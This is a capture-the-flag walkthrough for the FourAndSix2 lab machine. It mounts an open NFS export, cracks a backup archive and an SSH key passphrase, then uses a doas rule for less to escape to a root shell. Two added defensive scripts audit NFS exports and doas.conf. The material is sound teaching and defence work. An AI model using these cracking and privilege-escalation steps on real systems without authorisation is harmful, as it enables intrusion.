
FourAndSix2

user shell

Target IP: 192.168.205.134

Port information

22/tcp   open  ssh     OpenSSH 7.9 (protocol 2.0)
111/tcp  open  rpcbind 2 (RPC #100000)
2049/tcp open  nfs     2-3 (RPC #100003)

NFS discovered

https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting

Mounting the export locally reveals backup.7z; cracking it with the tool https://github.com/cyberblackhole/7zip-crack gives the password chocolate.
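The root cause on the NFS side is an export that any client may mount. The following is an added example, not part of the original writeup: it parses the text printed by `showmount -e <host>` (both the Linux nfs-utils wording "(everyone)" and the OpenBSD wording "Everyone") and reports exports with no client restriction. The export paths and client networks in the sample output are constructed, not taken from the target.

```python
"""Flag NFS exports that every client on the network is allowed to mount.

Added example (not from the writeup). Input is the output of `showmount -e`.
"""

# Constructed sample output in nfs-utils (Linux) wording; paths are assumed.
SAMPLE_LINUX = """Export list for 192.168.205.134:
/home/user/storage (everyone)
/srv/internal      10.0.0.0/24
"""

# The same constructed exports in OpenBSD showmount wording.
SAMPLE_OPENBSD = """Exports list on 192.168.205.134:
/home/user/storage             Everyone
/srv/internal                  10.0.0.0/24
"""


def parse_showmount(text):
    """Return a list of (path, [clients]) tuples from showmount -e output."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        # Skip the banner line and blank lines.
        if not line or line.startswith(("Export list", "Exports list")):
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        exports.append((path, clients))
    return exports


def is_world_exported(clients):
    """True when the export carries no client restriction at all."""
    if not clients:
        return True
    return any(c.strip("()").lower() in ("everyone", "*") for c in clients)


def open_exports(text):
    """Paths that an arbitrary host can mount, in the order listed."""
    return [path for path, clients in parse_showmount(text)
            if is_world_exported(clients)]


if __name__ == "__main__":
    for sample in (SAMPLE_LINUX, SAMPLE_OPENBSD):
        for path in open_exports(sample):
            print(f"world-mountable export: {path}")
```

Run it against the real `showmount -e` output of your own server; any path it prints should either be restricted to specific client addresses or networks in the exports file, or at least contain nothing sensitive (the writeup shows an archive holding an SSH private key sitting on such an export).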

Extracting it gives id_rsa and id_rsa.pub, so presumably login is via the private key.

Brute-force the passphrase of id_rsa

ssh2john id_rsa > id_rsa.hash
john --wordlist=/bin/rockyou.txt --format=ssh id_rsa.hash

Result: the passphrase of id_rsa is 12345678

Log in over SSH

ssh -i id_rsa user@fourandsix2

root shell

Enumeration

fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root

Privilege escalation

doas /usr/bin/less /var/log/authlog
v
:sh

https://gtfobins.github.io/gtfobins/less/

In effect this is the same as SUID privilege escalation through less.
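From the defender's side, the weak point is the doas rule itself: it needs no password, keeps the caller's environment, and hands root to an interactive pager that can spawn a shell. The following is an added example, not part of the original writeup: a small auditor that parses doas.conf rules (the two rules quoted above plus a constructed third rule for contrast) and reports those properties. The list of programs treated as shell-escape capable is an assumption based on well-known interactive pagers and editors.

```python
"""Audit doas.conf rules that can hand a non-root user a root shell.

Added example (not from the writeup). Rule grammar follows doas.conf(5):
  permit|deny [options] identity [as target] [cmd command [args ...]]
"""
import os
import shlex

# First two lines are the target's rules as quoted in the writeup; the third
# is a constructed, safer variant used for contrast.
DOAS_CONF = """permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
permit persist alice as root cmd /usr/bin/tail args -n 50 /var/log/authlog
"""

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}
# Assumed list: interactive programs with a documented shell escape.
SHELL_ESCAPE_CMDS = {"less", "more", "vi", "vim", "man"}


def parse_rule(line):
    """Parse one doas.conf line into a dict; None for blank or comment lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    toks = shlex.split(line)
    rule = {"action": toks[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(toks) and (toks[i] in OPTIONS or toks[i] == "setenv"):
        if toks[i] == "setenv":
            # Skip the brace-delimited variable list: setenv { VAR=value ... }
            i = toks.index("}", i) + 1
            rule["options"].add("setenv")
        else:
            rule["options"].add(toks[i])
            i += 1
    rule["identity"] = toks[i]
    i += 1
    if i < len(toks) and toks[i] == "as":
        rule["target"] = toks[i + 1]
        i += 2
    if i < len(toks) and toks[i] == "cmd":
        rule["cmd"] = toks[i + 1]
        i += 2
        if i < len(toks) and toks[i] == "args":
            rule["args"] = toks[i + 1:]
    return rule


def findings(rule):
    """Reasons a permit rule is risky; empty list when nothing stands out."""
    out = []
    if rule["action"] != "permit":
        return out
    # No "as" clause means any target user, which includes root.
    if rule["target"] not in (None, "root"):
        return out
    if rule["identity"] == "root":
        return out  # root running as root gains nothing
    if rule["cmd"] is None:
        out.append("no cmd restriction: any command as root")
    elif os.path.basename(rule["cmd"]) in SHELL_ESCAPE_CMDS:
        out.append(f"{rule['cmd']} can spawn a shell (interactive shell escape)")
    if "nopass" in rule["options"]:
        out.append("nopass: no authentication required")
    if "keepenv" in rule["options"]:
        out.append("keepenv: caller controls the environment of the root process")
    return out


def audit(conf_text):
    """Map each risky rule (stripped line text) to its list of findings."""
    report = {}
    for line in conf_text.splitlines():
        rule = parse_rule(line)
        if rule and findings(rule):
            report[line.strip()] = findings(rule)
    return report


if __name__ == "__main__":
    for rule_text, reasons in audit(DOAS_CONF).items():
        print(rule_text)
        for reason in reasons:
            print("   -", reason)
```

For the rule in the writeup the auditor reports all three problems. The fix is to stop delegating an interactive pager: grant a non-interactive command such as `tail` or `cat` on the specific log file instead, drop `keepenv`, and require authentication (`persist` rather than `nopass`). If less is genuinely needed, doas's `setenv { LESSSECURE=1 }` runs it in secure mode, where the `v` and `!` commands are disabled, but a narrower command is the cleaner answer.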